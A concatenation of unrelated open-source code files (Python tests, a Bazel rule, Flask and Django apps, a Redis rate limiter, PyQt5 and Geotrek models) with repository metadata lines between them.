self._assert_map(self.data, self.rule, expected)
def test_null_key_part_should_not_yield_result(self):
self.data['city'] = None
expected = []
self._assert_map(self.data, self.rule, expected)
def test_null_value_part_should_yield_result(self):
self.data['size'] = None
expected = [('["_default","canada","toronto"]', [100, None])]
self._assert_map(self.data, self.rule, expected)
def test_empty_key_part_should_yield_result(self):
self.data['city'] = ''
expected = [('["_default","canada",""]', [100, 1000])]
self._assert_map(self.data, self.rule, expected)
def test_empty_value_part_should_yield_result(self):
self.data['size'] = ''
expected = [('["_default","canada","toronto"]', [100, ''])]
self._assert_map(self.data, self.rule, expected)
def test_map_serialization(self):
# key parts are str casted & json serialized, value parts are are not
# (note the difference between the key date and value date results)
rule = InfernoRule(
key_parts=['date'],
value_parts=['date'])
expected = [('["_default","2012-12-01"]', [datetime.date(2012, 12, 1)])]
self._assert_map(self.data, rule, expected)
def test_field_transforms(self):
def upper(val):
return val.upper()
rule = InfernoRule(
key_parts=['country', 'city'],
value_parts=['population', 'size'],
field_transforms={'city': upper, 'country': upper})
expected = [('["_default","CANADA","TORONTO"]', [100, 1000])]
self._assert_map(self.data, rule, expected)
def test_parts_preprocess_that_yields_multiple_parts(self):
def lookup_language(parts, params):
for language in ['french', 'english']:
parts_copy = parts.copy()
parts_copy['language'] = language
yield parts_copy
rule = InfernoRule(
key_parts=['country'],
value_parts=['language'],
parts_preprocess=[lookup_language])
expected = [
('["_default","canada"]', ['french']),
('["_default","canada"]', ['english'])]
self._assert_map(self.data, rule, expected)
def test_field_transforms_happen_after_parts_preprocess(self):
def lookup_language(parts, params):
for language in ['french', 'english']:
parts_copy = parts.copy()
parts_copy['language'] = language
yield parts_copy
def upper(val):
return val.upper()
rule = InfernoRule(
key_parts=['country'],
value_parts=['language'],
parts_preprocess=[lookup_language],
field_transforms={'language': upper})
expected = [
('["_default","canada"]', ['FRENCH']),
('["_default","canada"]', ['ENGLISH'])]
self._assert_map(self.data, rule, expected)
def _assert_map(self, parts, rule, expected):
# turn disco_debug on for more code coverage
rule.params.disco_debug = True
actual = keyset_map(parts, rule.params)
ok_(isinstance(actual, types.GeneratorType))
eq_(list(actual), expected)
| 2.4375 | 2 |
dart/build_rules/internal/pub.bzl | nickclmb/rules_dart | 0 | 11071 | <reponame>nickclmb/rules_dart
# Copyright 2016 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
_pub_uri = "https://storage.googleapis.com/pub.dartlang.org/packages"
"""A set of BUILD rules that facilitate using or building on "pub"."""
def _pub_repository_impl(repository_ctx):
package = repository_ctx.attr.package
version = repository_ctx.attr.version
repository_ctx.download_and_extract(
"%s/%s-%s.tar.gz" % (_pub_uri, package, version),
repository_ctx.attr.output,
)
pub_deps = repository_ctx.attr.pub_deps
bazel_deps = ["\"@vendor_%s//:%s\"" % (dep, dep) for dep in pub_deps]
deps = ",\n".join(bazel_deps)
repository_ctx.file(
"%s/BUILD" % (repository_ctx.attr.output),
"""
load("@io_bazel_rules_dart//dart/build_rules:core.bzl", "dart_library")
package(default_visibility = ["//visibility:public"])
filegroup(name = "LICENSE_FILES", srcs=["LICENSE"])
dart_library(
name = "%s",
srcs = glob(["lib/**"]),
license_files = ["LICENSE"],
pub_pkg_name = "%s",
deps = [
%s
],
)
""" % (package, package, deps),
)
pub_repository = repository_rule(
attrs = {
"output": attr.string(),
"package": attr.string(mandatory = True),
"version": attr.string(mandatory = True),
"pub_deps": attr.string_list(default = []),
},
implementation = _pub_repository_impl,
)
| 1.6875 | 2 |
auror_core/__init__.py | millengustavo/auror-core | 11 | 11072 | <reponame>millengustavo/auror-core<gh_stars>10-100
import copy
import os
class Project(object):
def __init__(self, folder, *jobtypes):
self.jobtypes = jobtypes
self.folder = folder
self.params = []
self.version = 1
def is_v2(self):
self.version = 2
return copy.deepcopy(self)
def is_v1(self):
self.version = 1
return copy.deepcopy(self)
def with_params(self, *paramtypes):
self.params = paramtypes
return copy.deepcopy(self)
def write(self):
for param in self.params:
param._add_items()
param._write(self.folder)
for jobtype in self.jobtypes:
jobtype._add_items()
jobtype._write(self.folder)
if self.version == 2:
project_path = os.path.join(self.folder, 'flow20.project')
with open(project_path, 'w') as project:
project.write('azkaban-flow-version: 2.0')
| 2.609375 | 3 |
app.py | Vaishnavid14/snakegame | 5 | 11073 | <reponame>Vaishnavid14/snakegame<filename>app.py
'''
Purpose: Server responsible for routing
Author: Md. <NAME>
Command to execute: python app.py
'''
from flask import Flask
from flask import render_template
from flask import json
from flask import request
import random
import sys
app = Flask(__name__)
print("Server is live...", file = sys.stderr)
users = []
@app.route("/")
def index():
return render_template("index.html"), 200
@app.route("/generate", methods = ["POST"])
def generate():
this_user = {} # init user
send_data = {} # data to be sent
post_obj = request.json
rc = dimension(post_obj)
send_data["x"] = rc["x"]
send_data["y"] = rc["y"]
send_data["speed"] = 20
this_user["name"] = post_obj["name"] # sets the user's name
this_user["speed"] = send_data["speed"] # sets the user's speed
this_user["size"] = 0
users.append(this_user) # append it to the list of users
return json.dumps(send_data), 200
# sends the x and y coordinates to the client
@app.route("/regenerate", methods = ["POST"])
def regenerate():
send_data = {}
post_obj = request.json
rc = dimension(post_obj)
send_data["x"] = rc["x"]
send_data["y"] = rc["y"]
return json.dumps(send_data), 200
# sends the size of the snake to the server
@app.route("/size", methods = ["POST"])
def size():
temp = {}
obj_obj = request.json
for i in range(len(users)):
if obj_obj["name"] == users[i]["name"]:
temp = users[i]
users[users.index(temp)]["size"] += 1
send_data = {}
send_data["size"] = users[users.index(temp)]["size"]
return json.dumps(send_data), 200
'''
Function: dimensions
Purpose: generates a random x and y coordinate within a limit to send it the client
in: obj
'''
def dimension(obj):
rc = {}
width_min = int(obj["width_min"])
width_max = int(obj["width_max"])
height_min = int(obj["height_min"])
height_max = int(obj["height_max"])
x = random_number(width_min, width_max)
y = random_number(height_min, height_max)
rc["x"] = x
rc["y"] = y
return rc
'''
Function: random_number
Purpose: generates a random number between a particular range
in: min, max
'''
def random_number(min, max):
return random.randint(min, max)
if __name__ == "__main__":
app.run(host = "localhost", port = 2406, debug = True) | 2.9375 | 3 |
grafana_api/api/__init__.py | sedan07/grafana_api | 0 | 11074 | <filename>grafana_api/api/__init__.py
from .base import Base
from .admin import Admin
from .dashboard import Dashboard
from .datasource import Datasource
from .folder import Folder
from .organisation import Organisation, Organisations
from .search import Search
from .user import User, Users
| 1.070313 | 1 |
shop/views.py | Ayushman-Singh/ecommerce | 1 | 11075 | from shop.forms import UserForm
from django.views import generic
from django.urls import reverse_lazy
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import auth
from .models import Product, Contact, Category, Product, Order, OrderItem
from django.contrib import messages
from django.views.decorators.csrf import ensure_csrf_cookie
from math import ceil
import json
from shop.models import User
from django.views.decorators.csrf import csrf_exempt
# from PayTm import checksum
# Create your views here.
from django.http import HttpResponse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
MERCHANT_KEY = 'Your-Merchant-Key-Here'
def index(request, category_slug=None):
category = None
categories = Category.objects.all()
products = Product.objects.filter(available=True)
if category_slug:
category = get_object_or_404(Category, slug=category_slug)
products = products.filter(category=category)
page = request.GET.get('page')
paginator = Paginator(products, 6)
try:
products = paginator.page(page)
except PageNotAnInteger:
products = paginator.page(1)
except EmptyPage:
products = paginator.page(1)
if request.user:
print(request.user)
pass
# wishlist = Wishlist.objects.filter(user=request.user)
return render(
request,
'shop/index.html',
{
'category': category,
'categories': categories,
'products': products,
# 'wishlist': wishlist
}
)
else:
return render(
request,
'shop/index.html',
{
'category': category,
'categories': categories,
'products': products,
}
)
def searchMatch(query, item):
'''return true only if query matches the item'''
if query in item.description.lower() or query in item.name.lower():
return True
else:
return False
def search(request):
query = request.GET.get('search')
allProds = []
catprods = Product.objects.values('category', 'id')
cats = {item['category'] for item in catprods}
for cat in cats:
prodtemp = Product.objects.filter(category=cat)
prod = [item for item in prodtemp if searchMatch(query, item)]
n = len(prod)
nSlides = n // 4 + ceil((n / 4) - (n // 4))
if len(prod) != 0:
allProds.append([prod, range(1, nSlides), nSlides])
params = {
'products': allProds,
"msg": ""
}
if len(allProds) == 0 or len(query) < 4:
params = {
'msg': "Please make sure to enter relevant search query"
}
return render(request, 'shop/search.html', params)
def about(request):
return render(request, 'shop/about.html')
def contact(request):
thank = False
if request.method == "POST":
name = request.POST.get('name', '')
email = request.POST.get('email', '')
phone = request.POST.get('phone', '')
desc = request.POST.get('desc', '')
contact = Contact(name=name, email=email, phone=phone, desc=desc)
contact.save()
thank = True
return render(request, 'shop/contact.html', {'thank': thank})
def tracker(request):
if request.method == "POST":
orderId = request.POST.get('orderId', '')
email = request.POST.get('email', '')
try:
order = Order.objects.filter(order_id=orderId, email=email)
if len(order) > 0:
update = OrderUpdate.objects.filter(order_id=orderId)
updates = []
for item in update:
updates.append(
{
'text': item.update_desc,
'time': item.timestamp
}
)
response = json.dumps(
{
"status": "success",
"updates": updates,
"itemsJson": order[0].items_json
},
default=str
)
return HttpResponse(response)
else:
return HttpResponse('{"status":"noitem"}')
except Exception as e:
return HttpResponse('{"status":"error"}')
return render(request, 'shop/tracker.html')
def productView(request, myid):
# Fetch the product using the id
product = Product.objects.filter(id=myid)
return render(request, 'shop/prodView.html', {'product': product[0]})
def checkout(request):
if request.method == "POST":
items_json = request.POST.get('itemsJson', '')
name = request.POST.get('name', '')
amount = request.POST.get('amount', '')
email = request.POST.get('email', '')
address = request.POST.get('address1', '') + \
" " + request.POST.get('address2', '')
city = request.POST.get('city', '')
state = request.POST.get('state', '')
zip_code = request.POST.get('zip_code', '')
phone = request.POST.get('phone', '')
order = Order(
name=name, email=email,
address=address,
state=state,
# zip_code=zip_code,
# phone=phone,
# amount=amount
)
order.save()
order_item = OrderItem(
order=order,
price=amount,
product_id=1,
)
order_item.save()
thank = True
# id = order.order_id
return render(request, 'shop/checkout.html', {'thank':thank, 'id': order.id})
# Request paytm to transfer the amount to your account after payment by user
param_dict = {
'MID': 'Your-Merchant-Id-Here',
'ORDER_ID': str(order.order_id),
'TXN_AMOUNT': str(amount),
'CUST_ID': email,
'INDUSTRY_TYPE_ID': 'Retail',
'WEBSITE': 'WEBSTAGING',
'CHANNEL_ID': 'WEB',
'CALLBACK_URL': 'http://127.0.0.1:8000/handlerequest/',
}
# param_dict['CHECKSUMHASH'] = checksum.generate_checksum(param_dict, MERCHANT_KEY)
# return render(request, '/paytm.html', {'param_dict': param_dict})
return render(request, 'shop/checkout.html')
def signup(request):
if request.method == 'POST':
print('psot')
form = UserForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
# commit=False tells Django that "Don't send this to database yet.
# I have more things I want to do with it."
# import pdb;pdb.set_trace()
if form.cleaned_data['type']=='Vendor':
user.is_staff = True # Set the user object here
user.save()
return redirect("/admin/login")
else:
user.is_staff = False
user.save()
return redirect("/login") # Now you can send it to DB
else:
print('in valid vin vlaidpsot')
form = UserForm()
print(form.errors)
return render(
request,
'shop/signup.html',{
'form':form,
'errors':form.errors
})
else:
print('hello jasfdjlasdjfs')
form = UserForm()
return render(
request,
'shop/signup.html',{
'form':form
})
@csrf_exempt
def handlerequest(request):
# paytm will send you post request here
form = request.POST
response_dict = {}
for i in form.keys():
response_dict[i] = form[i]
if i == 'CHECKSUMHASH':
checksum = form[i]
# verify = Checksum.verify_checksum(response_dict, MERCHANT_KEY, checksum)
# if verify:
# if response_dict['RESPCODE'] == '01':
# print('order successful')
# else:
# print('order was not successful because' + response_dict['RESPMSG'])
return render(request, 'shop/paymentstatus.html', {'response': response_dict})
def vendor(request):
user =User.objects.get(id=request.user.id)
menu = {}
return render(request, 'shop/restprofile.html', {'user':user})
from django.views.generic.edit import UpdateView
class UserUpdate(UpdateView):
model = User
fields = ['name','email','first_name','last_name']
template_name_suffix = '_update_form' | 2.0625 | 2 |
SimMuon/GEMDigitizer/python/muonGEMDigi_cff.py | NTrevisani/cmssw | 3 | 11076 | import FWCore.ParameterSet.Config as cms
from SimMuon.GEMDigitizer.muonGEMDigis_cfi import *
from SimMuon.GEMDigitizer.muonGEMPadDigis_cfi import *
from SimMuon.GEMDigitizer.muonGEMPadDigiClusters_cfi import *
muonGEMDigiTask = cms.Task(simMuonGEMDigis, simMuonGEMPadDigis, simMuonGEMPadDigiClusters)
muonGEMDigi = cms.Sequence(muonGEMDigiTask)
| 1.09375 | 1 |
paas-ce/paas/esb/lib/redis_rate_limit/ratelimit.py | renmcc/bk-PaaS | 767 | 11077 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
"""A distributed rate limiter rely on redis
based on `token bucket <https://en.wikipedia.org/wiki/Token_bucket>` algorithm
Usage
~~~~~
.. code-block:: python
# Init a redis connection pool
import redis
redisdb = redis.Redis()
rate = RateLimiter(redisdb, identifier='ip=127.0.0.1 path=/get_user_info/')
# Allow 10 requests every 1 minute
# period also accepts seconds/minutes/hours/days as key
rate.add_rule(tokens=10, period={'minute': 1})
# You could add multiple rules for on limiter
# rate.add_rule(tokens=200, period={'hour': 1})
print rate.acquire()
# returns {'allowed': True, 'remaining_tokens': 9.0}
"""
import time
import logging
from redis import WatchError
logger = logging.getLogger('root')
class BaseRateLimiter(object):
def __init__(self, redisdb, identifier, namespace='', tokens=None, period=None):
"""Init a RateLimiter class
:param redisdb: a `redis.Redis` instance
:param str identifier: identifier for the limiter, such as an user_id etc.
:param str namespace: namespace for redis keys
:param int tokens: maxium tokens for one time period
:param dict period: dict, time period, such as {'minutes': 10}
"""
self.redisdb = redisdb
self.identifier = identifier
self.namespace = namespace
self.rules = []
# Add rule
if tokens is not None and period:
self.add_rule(tokens, period)
self.prepare()
def prepare(self):
"""Prepare to work
"""
pass
def add_rule(self, tokens, period):
"""Add multiple rules for this limiter, see `__init__` for parameter details
"""
rule = Rule(tokens, Rule.period_to_seonds(period))
self.rules.append(rule)
def acquire(self, tokens=1):
"""Acquire for a single request
:param int tokens: tokens to consume for this request, default to 1
"""
if not self.rules:
return {'allowed': True, 'remaining_tokens': 0}
logger.debug('Start acquiring tokens by given rules, this operation may have several '
'communications with redis.')
rets = []
for rule in self.rules:
logger.debug('Acquiring by single rule, rule=%s tokens=%s', rule, tokens)
ret = self.acquire_by_single_rule(rule, tokens)
logger.debug('Acquiring finished, result=%s', ret)
if not ret['allowed']:
logger.debug('Acquiring denied by given rule, rule=%s.', rule)
return ret
rets.append(ret)
logger.debug('Acquiring successed.')
return {
'allowed': True,
'remaining_tokens': min(x['remaining_tokens'] for x in rets)
}
class RateLimiter(BaseRateLimiter):
"""Rate limiter class
"""
def acquire_by_single_rule(self, rule, tokens=1):
"""Acquire an request quota from limiter
:param rule: `Rule` object
:param int tokens: tokens to be consumed, default 1
:returns: a dict of `allowed` and `remaining_tokens`
- allowed: wheather this request is allowed
- remaining_tokens: remaining_tokens for this rule's period
"""
rk_tokens = 'rlim::%s::tokens::%s::r%s' % (self.namespace, self.identifier, rule.to_string())
rk_last_ts = 'rlim::%s::last_ts::%s::r%s' % (self.namespace, self.identifier, rule.to_string())
rule_ttl_seconds = rule.period_seconds + 10
try:
rv_last_ts = float(self.redisdb.get(rk_last_ts))
rv_tokens = float(self.redisdb.get(rk_tokens))
except Exception:
# Inintilize values if not exists
rv_last_ts = time.time()
rv_tokens = rule.tokens
self.redisdb.set(rk_tokens, rv_tokens, ex=rule_ttl_seconds)
self.redisdb.set(rk_last_ts, '%.3f' % rv_last_ts, ex=rule_ttl_seconds)
# Add fresh tokens since last timestamp
with self.redisdb.pipeline() as pipe:
pipe.watch(rk_last_ts)
# Float precision may cause this value negative
# Add token by passed time
senconds_passed = max(time.time() - rv_last_ts, 0)
fresh_tokens = rule.fresh_tokens_by_seconds(senconds_passed)
remaining_tokens = rv_tokens
# Only add fresh token when it's greater than 1
# Passed time maybe less than 1, fresh_token more than 1
if fresh_tokens >= 1 and remaining_tokens < rule.tokens:
# Never add let tokens more than rule.tokens
fresh_tokens = min(fresh_tokens, rule.tokens - remaining_tokens)
pipe.multi()
pipe.incrbyfloat(rk_tokens, fresh_tokens)
pipe.expire(rk_tokens, rule_ttl_seconds)
pipe.set(rk_last_ts, '%.3f' % time.time(), ex=rule_ttl_seconds)
# Ignore WatchError
try:
pipe.execute()
except WatchError:
pass
# Remove tokens, if tokens to consume are bigger than remaining tokens, do nothing
# and return Flase
remaining_tokens = self.redisdb.incrbyfloat(rk_tokens, -tokens)
over_limit = False
if remaining_tokens < 0:
remaining_tokens = self.redisdb.incrbyfloat(rk_tokens, tokens)
over_limit = True
return {
'allowed': not over_limit,
'remaining_tokens': max(remaining_tokens, 0)
}
class SimpleLimiter(BaseRateLimiter):
def prepare(self):
self.simple_incr = self.redisdb.register_script('''\
local current
current = redis.call("incr", KEYS[1])
if tonumber(current) == 1 then
redis.call("expire", KEYS[1], ARGV[1])
end
return current''')
def acquire_by_single_rule(self, rule, tokens=1):
"""Acquire an request quota from limiter
:param rule: `Rule` object
:param int tokens: tokens to be consumed, default 1
:returns: a dict of `allowed` and `remaining_tokens`
- allowed: wheather this request is allowed
- remaining_tokens: remaining_tokens for this rule's period
"""
# TODO: Should we use ( current timestamp / period_seconds ) as part of the redis key?
rk_counter = 'rlim::%s::scounter::%s::r%s' % (self.namespace, self.identifier, rule.to_string())
old_cnt = self.redisdb.get(rk_counter)
if old_cnt is not None and int(old_cnt) >= rule.tokens:
return {
'allowed': False,
'remaining_tokens': 0.0
}
new_cnt = self.simple_incr(keys=[rk_counter], args=[rule.period_seconds])
return {
'allowed': True,
'remaining_tokens': max(0, rule.tokens - new_cnt)
}
class Rule(object):
"""Rule class for RateLimiter"""
time_unit_to_seconds = {
'second': 1,
'minute': 60,
'hour': 3600,
'day': 3600 * 24,
}
@classmethod
def period_to_seonds(cls, period):
for unit, seconds in cls.time_unit_to_seconds.items():
if unit in period:
period_seconds = period[unit] * seconds
break
else:
raise ValueError(('Invalid period %s given, should be '
'{"second/minute/hour/day": NUMBER}') % period)
return period_seconds
def __init__(self, tokens, period_seconds):
self.tokens = tokens
# Precision of seconds only to second
self.period_seconds = int(period_seconds)
if tokens < 0:
logger.warn('Will not allow any acquire because given tokens < 0')
def to_string(self):
return "%s_%s" % (self.tokens, self.period_seconds)
def fresh_tokens_by_seconds(self, seconds):
return int(self.rate_per_seconds * seconds)
@property
def rate_per_seconds(self):
return self.tokens / float(self.period_seconds)
def __repr__(self):
return '<Rule %s>' % self.to_string()
| 2.140625 | 2 |
tela_cadastro_loja_embala.py | lucasHashi/PyQt5-gerenciador-de-vendas-de-comidas | 1 | 11078 | <reponame>lucasHashi/PyQt5-gerenciador-de-vendas-de-comidas
import sys
from PyQt5 import QtCore, QtGui, QtWidgets, uic
import database_receita
import pyqt5_aux
qt_tela_inicial = "telas/tela_cadastro_loja_embala.ui"
Ui_MainWindow, QtBaseClass = uic.loadUiType(qt_tela_inicial)
class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):
switch_tela_gerenciar_loja_embala = QtCore.pyqtSignal(int, int, float, str, str, int, str, float, str)
def __init__(self):
QtWidgets.QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.setupUi(self)
#CONFIG BOTOES
self.btn_cadastrar.pressed.connect(self.cadastrar_loja_embala)
self.btn_limpar.pressed.connect(self.limpar_loja_embala)
self.btn_ativa_loja.pressed.connect(self.ativar_loja)
self.btn_sair.pressed.connect(self.fechar_tela)
#CARREGAR COMBO INGREDIENTES
self.carrega_ingredientes()
#QUANDO UM INGREDIENTE FOR SELECIONADO NA COMBO
self.combo_ingrediente.currentIndexChanged.connect(self.ingrediente_selecionado)
#QUANDO UMA EMBALAGEM FOR DOUBLE-CLICADA
self.list_embalagens.itemDoubleClicked.connect(self.embalagem_selecionada)
#QUANDO SELECIONAR UMA LOJA, COLOCAR NO TXT_LOJA
self.carrega_lojas()
self.combo_loja.currentIndexChanged.connect(self.loja_selecionada)
#QUANDO UM CADASTRADO FOR DOUBLE-CLICADO
self.tb_loja_embala_cadastrados.cellDoubleClicked.connect(self.loja_embala_selecionado)
#ATUALIZA A TABLE LOJA_EMBALA
#self.carrega_loja_embala()
header = self.tb_loja_embala_cadastrados.horizontalHeader()
self.tb_loja_embala_cadastrados.setHorizontalHeaderLabels(['Codigo', 'Tamanho', 'Unidade', 'Marca', 'Loja', 'Preço'])
#header.setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(5, QtWidgets.QHeaderView.ResizeToContents)
def carrega_loja_embala(self, id_ingrediente):
lista_dados = database_receita.select_loja_embala_por_ingrediente_lista(id_ingrediente)
pyqt5_aux.carregar_dados_table_widget(self.tb_loja_embala_cadastrados, lista_dados)
def embalagem_selecionada(self, item):
self.combo_loja.setEnabled(True)
self.btn_ativa_loja.setEnabled(True)
self.btn_cadastrar.setEnabled(True)
self.btn_limpar.setEnabled(True)
self.double_preco.setEnabled(True)
self.txt_embalagem.setText(str(item.text()))
def loja_selecionada(self, item):
try:
_, nome = str(self.combo_loja.currentText()).split(' - ')
self.txt_loja.setText(nome)
except:
self.txt_loja.clear()
def ingrediente_selecionado(self, item):
try:
id_ingrediente = str(self.combo_ingrediente.currentText()).split(' - ')[0]
self.carrega_embalagens(id_ingrediente)
self.list_embalagens.setEnabled(True)
self.carrega_loja_embala(id_ingrediente)
except:
self.list_embalagens.setEnabled(False)
def carrega_ingredientes(self):
lista_ingredientes = ['Ingredientes cadastrados']
lista_ingredientes += database_receita.select_ingredientes_nomes()
self.combo_ingrediente.addItems(lista_ingredientes)
def cadastrar_loja_embala(self):
try:
id_loja, nome_loja = self.combo_loja.currentText().split(' - ')
except ValueError:
id_loja, nome_loja = 0, self.txt_loja.text()
#CADASTRA LOJA SE FOR NOVA
if(self.txt_loja.isEnabled()):
id_loja = database_receita.insere_loja(nome_loja)
#PEGAR OS DADOS: ID_LOJA, ID_EMBALAGEM, PRECO
id_embalagem = int(str(self.txt_embalagem.text()).split(' - ')[0])
preco = self.double_preco.value()
#CADASTRA LOJA_EMBALA
database_receita.insere_loja_embala(preco, id_loja, id_embalagem)
#ATUALIZA A TABLE LOJA_EMBALA
id_ingrediente = self.combo_ingrediente.currentText().split(' - ')[0]
self.carrega_loja_embala(id_ingrediente)
#LIMPA: LOJA, PRECO, TXT_EMBALAGEM
self.txt_loja.clear()
self.txt_loja.setEnabled(False)
self.btn_ativa_loja.setText('+')
self.btn_ativa_loja.setEnabled(False)
self.carrega_lojas()
self.double_preco.clear()
self.double_preco.setEnabled(False)
self.txt_embalagem.clear()
#DESATIVA BOTOES: CADASTRAR, LIMPAR
self.btn_cadastrar.setEnabled(False)
self.btn_limpar.setEnabled(False)
def carrega_embalagens(self, id_ingrediente):
self.list_embalagens.clear()
lista_embalagens = database_receita.select_embalagens_por_ingrediente_nomes(id_ingrediente)
self.list_embalagens.addItems(lista_embalagens)
def carrega_lojas(self):
self.combo_loja.clear()
lista_lojas = ['Lojas cadastradas']
lista_lojas += database_receita.select_lojas_nomes()
self.combo_loja.addItems(lista_lojas)
def ativar_loja(self):
if(self.txt_loja.isEnabled()):
self.txt_loja.clear()
self.txt_loja.setEnabled(False)
self.btn_ativa_loja.setText('+')
self.combo_loja.setEnabled(True)
else:
self.txt_loja.setEnabled(True)
self.btn_ativa_loja.setText('-')
self.combo_loja.setEnabled(False)
def limpar_loja_embala(self):
#LIMPA: LOJA, PRECO, TXT_EMBALAGEM
self.txt_loja.clear()
self.txt_loja.setEnabled(False)
self.btn_ativa_loja.setText('+')
self.btn_ativa_loja.setEnabled(False)
self.carrega_lojas()
self.double_preco.clear()
self.double_preco.setEnabled(False)
def loja_embala_selecionado(self, linha, coluna):
id_loja_embala = self.tb_loja_embala_cadastrados.item(linha, 0).text()
_, _, id_loja, id_embalagem = database_receita.select_loja_embala_por_id(id_loja_embala)
tamanho = self.tb_loja_embala_cadastrados.item(linha, 1).text()
unidade = self.tb_loja_embala_cadastrados.item(linha, 2).text()
marca = self.tb_loja_embala_cadastrados.item(linha, 3).text()
nome_loja = self.tb_loja_embala_cadastrados.item(linha, 4).text()
preco = self.tb_loja_embala_cadastrados.item(linha, 5).text()
ingrediente = self.combo_ingrediente.currentText().split(' - ')[1]
print(id_loja_embala, id_embalagem, tamanho, unidade, marca, id_loja, nome_loja, preco, ingrediente)
self.switch_tela_gerenciar_loja_embala.emit(int(id_loja_embala), int(id_embalagem), float(tamanho), unidade, marca, int(id_loja), nome_loja, float(preco), ingrediente)
def fechar_tela(self):
self.close()
| 2.46875 | 2 |
test/test_layers.py | mukeshv0/ParallelWaveGAN | 0 | 11079 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 <NAME>
# MIT License (https://opensource.org/licenses/MIT)
import logging
import numpy as np
import torch
from parallel_wavegan.layers import Conv1d
from parallel_wavegan.layers import Conv1d1x1
from parallel_wavegan.layers import Conv2d
from parallel_wavegan.layers import ConvInUpsampleNetwork
from parallel_wavegan.layers import UpsampleNetwork
logging.basicConfig(
level=logging.DEBUG, format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s")
def test_conv_initialization():
conv = Conv1d(10, 10, 3, bias=True)
np.testing.assert_array_equal(conv.bias.data.numpy(),
np.zeros_like(conv.bias.data.numpy()))
conv1x1 = Conv1d1x1(10, 10, bias=True)
np.testing.assert_array_equal(conv1x1.bias.data.numpy(),
np.zeros_like(conv1x1.bias.data.numpy()))
kernel_size = (10, 10)
conv2d = Conv2d(10, 10, kernel_size, bias=True)
np.testing.assert_array_equal(conv2d.weight.data.numpy(),
np.ones_like(conv2d.weight.data.numpy()) / np.prod(kernel_size))
np.testing.assert_array_equal(conv2d.bias.data.numpy(),
np.zeros_like(conv2d.bias.data.numpy()))
kernel_size = (1, 10)
conv2d = Conv2d(10, 10, kernel_size, bias=True)
np.testing.assert_array_equal(conv2d.weight.data.numpy(),
np.ones_like(conv2d.weight.data.numpy()) / np.prod(kernel_size))
np.testing.assert_array_equal(conv2d.bias.data.numpy(),
np.zeros_like(conv2d.bias.data.numpy()))
def test_upsample():
length = 10
scales = [4, 4]
x = torch.randn(1, 10, length)
upsample = UpsampleNetwork(scales)
y = upsample(x)
assert x.size(-1) * np.prod(scales) == y.size(-1)
for aux_context_window in [0, 1, 2, 3]:
conv_upsample = ConvInUpsampleNetwork(scales,
aux_channels=x.size(1),
aux_context_window=aux_context_window)
y = conv_upsample(x)
assert (x.size(-1) - 2 * aux_context_window) * np.prod(scales) == y.size(-1)
| 2.15625 | 2 |
geotrek/tourism/models.py | ker2x/Geotrek-admin | 0 | 11080 | <gh_stars>0
import os
import re
import logging
from django.conf import settings
from django.contrib.gis.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.formats import date_format
from easy_thumbnails.alias import aliases
from easy_thumbnails.exceptions import InvalidImageFormatError
from easy_thumbnails.files import get_thumbnailer
from mapentity.registry import registry
from mapentity.models import MapEntityMixin
from mapentity.serializers import plain_text, smart_plain_text
from geotrek.authent.models import StructureRelated
from geotrek.core.models import Topology
from geotrek.common.mixins import (NoDeleteMixin, TimeStampedModelMixin,
PictogramMixin, OptionalPictogramMixin,
PublishableMixin, PicturesMixin,
AddPropertyMixin)
from geotrek.common.models import Theme
from geotrek.common.utils import intersecting
from extended_choices import Choices
if 'modeltranslation' in settings.INSTALLED_APPS:
from modeltranslation.manager import MultilingualManager
else:
from django.db.models import Manager as MultilingualManager
logger = logging.getLogger(__name__)
def _get_target_choices():
""" Populate choices using installed apps names.
"""
apps = [('public', _("Public website"))]
for model, entity in registry.registry.items():
if entity.menu:
appname = model._meta.app_label.lower()
apps.append((appname, unicode(entity.label)))
return tuple(apps)
class InformationDeskType(PictogramMixin):
label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='label')
class Meta:
db_table = 't_b_type_renseignement'
verbose_name = _(u"Information desk type")
verbose_name_plural = _(u"Information desk types")
ordering = ['label']
def __unicode__(self):
return self.label
class InformationDesk(models.Model):
name = models.CharField(verbose_name=_(u"Title"), max_length=256, db_column='nom')
type = models.ForeignKey(InformationDeskType, verbose_name=_(u"Type"),
related_name='desks', db_column='type')
description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description',
help_text=_(u"Brief description"))
phone = models.CharField(verbose_name=_(u"Phone"), max_length=32,
blank=True, null=True, db_column='telephone')
email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email',
blank=True, null=True)
website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website',
blank=True, null=True)
photo = models.FileField(verbose_name=_(u"Photo"), upload_to=settings.UPLOAD_DIR,
db_column='photo', max_length=512, blank=True, null=True)
